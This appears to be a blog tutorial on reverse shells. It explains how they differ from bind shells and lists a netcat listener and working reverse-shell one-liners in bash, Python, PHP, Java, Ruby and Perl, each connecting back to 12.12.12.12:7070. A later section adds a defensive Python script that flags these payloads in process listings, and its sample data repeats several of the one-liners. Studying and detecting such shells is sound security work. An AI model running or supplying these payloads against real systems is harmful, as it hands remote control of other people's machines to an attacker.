Reverse Shells
How do reverse shells work?
In a typical remote shell, a machine controlled by the attacker connects to the remote network host and requests a shell connection.
This is called a bind shell.
But what if the remote host is not directly accessible, for example because it has no public IP address or is protected by a firewall?
In this situation a reverse shell can be used instead: the target machine initiates the connection to a listening host controlled by the attacker, and a shell is established over that connection.
Reverse Shell Examples
To start, the attacker needs a listener process on their own system that waits for incoming reverse shell connections to their IP address, e.g. 12.12.12.12.
On Linux, this can be as simple as one netcat command.
nc -lvnp 7070
The netcat listener will listen on port 7070. The attacker then needs to execute code on the target that connects back to the listener. Many reverse shell payloads depend on a particular programming language interpreter being present on the target system.
Check out pentestmonkey’s Reverse Shell Cheat Sheet for more.
The payloads are typically one-liners so that they can be injected with a single command.
While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i to cmd.exe.
Bash Reverse Shell
If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:
/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1
Python Reverse Shell
With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell
Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers):
php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'
Java Reverse Shell
Java is likely to be available on application servers:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Ruby Reverse Shell
Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:
ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Perl Reverse Shell
As with bash, a Perl interpreter should be available on most Linux servers, so a Perl one-liner is another way to obtain a reverse shell:
perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
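From the defender's side, every one-liner above leaves a recognisable command line on the target (a shell with its standard streams redirected to /dev/tcp, an interpreter calling socket/dup2/exec, fsockopen followed by exec, and so on), so the process list is one of the simplest places to catch them. The following Python script is an added example written for this page; it is not part of the original post and not code from pentestmonkey's cheat sheet. It scans a ps-style process listing for the language patterns shown above and extracts the callback address and port. The process listing is constructed for this example (quoting is shown as ps would report it, with the shell's single quotes already stripped), and the indicator names are this example's own labels.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicator patterns keyed to the one-liners on this page. Every regex in a
# tuple's list must match before the indicator counts as a hit, which keeps
# ordinary "import socket" or "exec(" usage from firing on its own.
INDICATORS = [
    ("bash-dev-tcp", [r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"]),
    ("python-socket-dup2", [r"\bimport\s+socket\b", r"os\.dup2\(", r"subprocess|pty"]),
    ("php-fsockopen-exec", [r"fsockopen\(", r"exec\("]),
    ("ruby-tcpsocket-exec", [r"TCPSocket\.open\(", r"\bexec\b"]),
    ("perl-socket-exec", [r"use\s+Socket", r"socket\(S", r"exec\("]),
]

# "12.12.12.12/7070" (bash) and "12.12.12.12",7070 (python/php/ruby) forms.
ENDPOINT_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})"?\s*[,/]\s*(\d{1,5})')
# Perl form: the address and port are assigned to separate variables first.
PERL_RE = re.compile(r'\$\w+\s*=\s*"(\d{1,3}(?:\.\d{1,3}){3})".*?\$\w+\s*=\s*(\d{1,5})')


@dataclass
class Finding:
    pid: int
    user: str
    indicators: List[str]
    callback: Optional[Tuple[str, int]]


def scan_command_line(cmdline: str) -> List[str]:
    """Return the names of every indicator whose regexes all match cmdline."""
    return [name for name, patterns in INDICATORS
            if all(re.search(p, cmdline) for p in patterns)]


def extract_callback(cmdline: str) -> Optional[Tuple[str, int]]:
    """Best-effort extraction of the (address, port) the payload connects to."""
    for regex in (ENDPOINT_RE, PERL_RE):
        m = regex.search(cmdline)
        if m:
            return m.group(1), int(m.group(2))
    return None


def scan_process_list(text: str) -> List[Finding]:
    """Scan 'pid user args' lines (as from `ps -eo pid,user,args`) and
    report every process whose command line matches an indicator."""
    findings = []
    for raw in text.splitlines():
        parts = raw.strip().split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header line or a process with no arguments
        pid, user, args = parts
        hits = scan_command_line(args)
        if hits:
            findings.append(Finding(int(pid), user, hits, extract_callback(args)))
    return findings


# Constructed sample listing: two benign processes and three of the page's
# one-liners as they would appear in the process table.
SAMPLE_PROCESS_LIST = """\
  PID USER     COMMAND
 1203 www-data /usr/sbin/apache2 -k start
 2310 www-data /bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1
 2415 www-data python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 2501 tomcat   java -jar /opt/app/app.jar
 2710 root     perl -e use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
 2811 deploy   python -c import socket; print(socket.gethostname())
"""

if __name__ == "__main__":
    for f in scan_process_list(SAMPLE_PROCESS_LIST):
        print(f"pid={f.pid} user={f.user} indicators={f.indicators} callback={f.callback}")
```

In practice the same patterns are worth running over shell history, web server access logs (where injected one-liners show up URL-encoded) and auditd EXECVE records, and the extracted callback address is the natural pivot into firewall and NetFlow data to confirm whether the outbound connection actually succeeded.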
Check out my Gist Here
Author: Yuma-Tsushima07